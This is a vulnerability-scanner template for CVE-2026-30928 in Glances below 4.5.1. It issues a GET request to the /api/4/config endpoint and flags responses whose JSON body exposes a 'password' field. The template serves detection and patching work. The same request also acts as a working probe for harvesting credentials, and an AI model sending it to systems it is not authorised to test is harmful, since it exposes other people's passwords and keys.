id: CVE-2026-30928 info: name: Glances - Information Disclosure author: theamanrawat severity: high description: | Glances < 4.5.1 contains an information disclosure vulnerability caused by unfiltered exposure of sensitive configuration data via the /api/4/config REST API endpoint, letting remote attackers access credentials, exploit requires API access. impact: | Attackers can access sensitive credentials, including passwords and keys, leading to potential full system compromise. remediation: | Upgrade to version 4.5.1 or later. reference: - https://github.com/nicolargo/glances/security/advisories/GHSA-gh4x-f7cq-wwx6 - https://nvd.nist.gov/vuln/detail/CVE-2026-30928 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2026-30928 epss-score: 0.01657 epss-percentile: 0.74151 cwe-id: CWE-200 metadata: verified: true max-request: 1 tags: cve,cve2026,glances,exposure http: - method: GET path: - "{{BaseURL}}/api/4/config" matchers-condition: and matchers: - type: regex part: body regex: - '"password": "[A-Za-z0-9_@.#&+-;$]*",' - type: word part: header words: - 'application/json' - type: status status: - 200 # digest: 4a0a0047304502203c06ef0295d67bdd3d24b2651021cc2c2c3a378e41c9b336b089fa84dea5d12d022100d78d625f30228e95c617f210eab2cd3014dc163b9609077267e447ce7aa4486a:922c64590222798bb761d5b6d8e72950